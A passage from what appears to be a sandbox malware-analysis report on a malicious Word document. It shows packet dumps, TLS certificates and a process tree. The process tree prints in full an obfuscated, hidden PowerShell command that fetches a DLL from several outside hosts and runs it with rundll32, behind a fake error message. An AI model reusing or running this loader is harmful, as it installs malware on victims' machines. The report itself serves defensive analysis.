1d 95 bc 84 f2 09 3b 95 d8 cb c8 eb 06 ba 74 a9 dc 75 90 15 05 e7 fd b6 ce dc 89 d4 ce 7a 73 4d 89 9e b3 b6 a8 66 dd cf 7c d5 38 08 77 53 57 fc 8e dd c5 42 05 3b 8f 55 9b 61 c7 bd 9d f0 78 a8 f8 92 6b 12 62 d4 4a 05 d6 be fd ca 1c b5 2c 09 91 43 41 3a 63 5a b4 ae b5 4c d1 75 29 98 50 12 40 00 71 27 77 a1 94 9d f7 ad 7a 3c 93 db bf 5e c9 c7 5f 0a 1d 8e 95 be ef 2a 02 9a 80 c8 66 0f 03 84 f5 e2 28 8d 33 5c 78 88 71 82 c1 ac 5c 0c e8 3f 30 6e 23 e1 87 55 11 46 07 8e fc 4a 93 cd a2 92 06 b0 51 95 d1 73 68 0e 57 41 b2 bd 03 ff 61 2d cc 89 2d 96 ab a4 18 c2 a9 3f 8c 87 79 2e eb 9a 8d ea 6b 16 59 eb ba d4 44 e3 16 2e 8f df 81 0f 97 31 2e f7 e2 89 37 80 ba 68 9d 48 5b ed 7e 47 c1 09 f5 3b 26 70 9b 33 7f e6 47 08 6d 65 74 d6 81 e9 17 18 e0 58 46 e0 37 e3 c0 93 d0 04 b0 58 3c f0 b1 e6 05 06 51 1d 68 4c 48 21 45 38 4c fb ae a7 1b ae cf 35 4b f3 04 e8 af 36 01 b4 1e bc 13 7f 8f 85 b8 e9 3e af ce f4 10 29 0c a8 e3 47 1f 53 21 c9 1c 59 8a 83 3d 1b b1 c5 1d 34 bc d9 3c dc e4 d1 e4 77 42 3e 9f f8 0c e4 ab 24 68 09 fa 79 dd 2e 06 a3 a8 42 bd 02 5a a2 d3 22 26 0b ed 96 b5 5d 54 fe 0e ff 09 fd dd 6b 7c 9b 8e aa 42 3d 24 2b 9e 1c 94 ae a2 0d 69 23 16 c7 45 4e 7a 32 0a c9 55 73 c6 23 49 e1 5d fe 14 8f 5d 3f 4a 37 0f b4 7f ef db 13 72 09 32 d4 aa ce 95 6b b8 32 83 bb 46 7b a9 c7 aa d6 0e 0d 12 61 ab 3a 30 00 5c 79 dd fb 03 6c 86 b4 b1 dc ae 5a 4f 67 01 ba ba 30 70 d9 e3 1d 3a aa 9c e6 9f 49 e8 8c ca c5 3a 20 d7 de ea 93 77 da 94 91 bb 43 dc 7b f5 1a d6 90 ef a8 3d 0b 99 47 a1 99 72 98 fc d6 16 46 1d f7 bc a6 e1 68 23 d9 81 e9 3d de c6 2f 78 70 9f b5 7b 31 59 43 dc 16 c7 81 9d 4e 66 4f c4 f4 56 2f 3b f0 4c dd 3e d2 83 fb 6a f2 6b 67 ec 0f 8a da 11 d2 66 d5 a7 ec bb d8 69 83 e8 e1 97 16 8c ee 7f ea eb a2 87 48 07 d4 01 c3 bd 39 d2 f1 5f 87 67 01 9b 30 0b d5 72 86 fc 86 d5 db f7 77 fd 2c 9a d7 1e e2 a9 99 da 9e fe 72 89 1a 3e 36 cc 26 98 6c 58 62 53 84 80 80 fa 6f 20 28 3a 03 f3 09 13 c4 3f 00 eb 60 f7 e2 3d c0 93 ba ab fe 36 7c db fc 4b 5b f7 59 91 90 81 54 e3 8c 55 7e aa 17 a7 27 bb ff 88 d9 3b 21 1c f1 03 8e 1e b9 64 1b 62 e0 3f ab 59 ae b1 6d cf ea 43 f4 4d 63 bf ec b1 42 34 4c 9a 91 d7 ce f7 e5 a3 25 40 3e 11 71 26 c6 dc 53 ee f7 8b 3e 3c 88 77 71 57 a0 4f ed 5b 64 9a 91 ad 56 10 39 e4 45 f6 3b a4 12 a5 d1 54 97 f4 39 db ac b4 2a 07 54 9a 86 6f a1 97 9f d4 18 bb 64 1a 07 ba d6 94 2c 96 86 a7 f6 29 c1 21 bb eb 92 1f 2c 19 ab f8 46 c9 a9 2c b7 64 3d e1 b9 db 61 b3 9d 65 f8 16 05 cf e7 0a 0f 66 fa 94 c2 ef fd 79 75 22 ea 2a f9 af e7 e6 ae c2 9f 5f c9 23 6a c3 b3 8a 70 8b 17 80 b1 45 80 92 a3 29 5b ed a2 23 5a a6 2f a8 0c 5f 9e b9 f3 ac c8 ab ce e8 fd 87 c8 ab a7 71 ac 9c 1e cd 2c 5a ea 94 d8 b5 76 17 71 e6 e3 fc 73 4f 55 2a 19 3c 29 ab eb a3 0b b9 e7 f7 90 ee 69 12 fe 73 b9 71 d6 99 12 f5 f7 48 03 7f 20 Data Ascii: c94BH;PzF'K%2uENmO`\byh<9TOQ;GpfGR5~!z'\|X?\HEKCK%+hW$&=b3h]4XLXMAG&tD'5cT6htb@'\|G$c+MOA9e&0z9QF8cf;tuzsMf\|8wSWB;UaxkbJ,CA:cZLu)P@q'wz<^_f(3\xq\?0n#UFJQshWAa--?y.kYD.1.7hH[~G;&p3GmetXF7X<QhLH!E8L5K6>)GS!Y=4<wB>$hy.BZ"&]Tk\|B=$+i#ENz2Us#I]]?J7r2k2F{a:0\ylZOg0p:I: wC{=GrFh#=/xp{1YCNfOV/;L>jkgfiH9_g0rw,r>6&lXbSo (:?`=6\|K[YTU~';!db?YmCMcB4L%@>q&S><wqWO[dV9E;T9Tod,)!,F,d=aefyu"_#jpE)[#Z/_q,ZvqsOU<)isqH
Jan 25, 2021 20:13:00.443974972 CET	742	IN	Data Raw: 37 53 1c 10 69 84 34 e0 82 a4 0a 07 28 4f 53 1b 99 3f 05 7e 38 cc 9a 5f cc 63 30 ca 21 06 86 45 16 b6 26 77 ea 23 15 5a be d2 39 fe a4 05 1c 58 26 5c 46 8c 21 74 97 aa 01 e8 2a b5 20 44 1e 5b 5f 4a 53 be 4c de 43 a7 fd 65 d1 30 ed 96 d0 57 44 46 Data Ascii: 7Si4(OS?~8_c0!E&w#Z9X&\F!t* D[_JSLCe0WDFXTpFY[
Jan 25, 2021 20:13:00.723769903 CET	743	IN	Data Raw: 4a 7d 6a 0e f9 a1 6f 47 81 60 5c 82 97 d9 3e 95 ac 64 15 b3 9e 96 20 21 19 d4 62 d2 63 5a 38 e0 2f 08 39 1a 3a 7d 25 38 fe 5c fb cb 35 bd 78 e6 de 0c f6 b5 9d d4 bd 44 6e 45 a7 bc 66 aa b2 d3 6d 49 13 be 92 60 68 13 ce 98 13 af ca 4d d8 8e a8 19 Data Ascii: J}joG`\>d !bcZ8/9:}%8\5xDnEfmI`hMFx'`]a@B)PP ;Pn!O`M9,plQ:$~9cw53^H=vA}1XN_08[L^]`I94bUn:*naD
Jan 25, 2021 20:13:00.723798037 CET	744	IN	Data Raw: 9b 62 a0 c6 8c c1 89 a3 52 f5 32 c3 74 3a b0 37 6d 78 b4 d2 5d e1 2d 4e 2f a6 34 20 c5 52 32 5f 1e d3 47 17 33 df 45 fb d2 76 c1 0e a4 9e 18 64 97 8e ed 12 1b e8 a5 14 9d 13 6e 75 69 9f 56 75 0d c3 f0 9a 7e 25 ed c6 e8 ce 71 04 1b a5 48 1a 16 66 Data Ascii: bR2t:7mx]-N/4 R2_G3EvdnuiVu~%qHfN}:/)"%gnGT9(qW^=Q{5 ,0Am`-O:y~'icvmTQ[AzpX?ang>SNq1}hX.Y}%V?ZS*-\|qk.u

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 25, 2021 20:10:44.976731062 CET	104.21.88.166	443	192.168.2.22	49166	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sat Aug 01 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Sun Aug 01 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Jan 25, 2021 20:10:44.976731062 CET	104.21.88.166	443	192.168.2.22	49166	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		05af1f5ca1b87cc9cc9b25185115607d
Jan 25, 2021 20:12:27.842226982 CET	212.227.200.73	443	192.168.2.22	49168	CN=*.traumfrauen-ukraine.de CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Mar 19 01:00:00 CET 2020 Mon Nov 27 13:46:10 CET 2017	Tue May 18 14:00:00 CEST 2021 Sat Nov 27 13:46:10 CET 2027	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Jan 25, 2021 20:12:27.842226982 CET	212.227.200.73	443	192.168.2.22	49168	CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 27 13:46:10 CET 2017	Sat Nov 27 13:46:10 CET 2027		05af1f5ca1b87cc9cc9b25185115607d
Jan 25, 2021 20:12:28.435795069 CET	192.0.78.20	443	192.168.2.22	49169	CN=*.wpcomstaging.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Sep 29 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019	Sun Oct 31 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2124 Parent PID: 584

General

Start time:	20:10:40
Start date:	25/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f3f0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1428 Parent PID: 1220

General

Start time:	20:10:41
Start date:	25/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
Imagebase:	0x49ed0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2376 Parent PID: 1428

General

Start time:	20:10:42
Start date:	25/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xffd10000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2280 Parent PID: 1428

General

Start time:	20:10:42
Start date:	25/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkA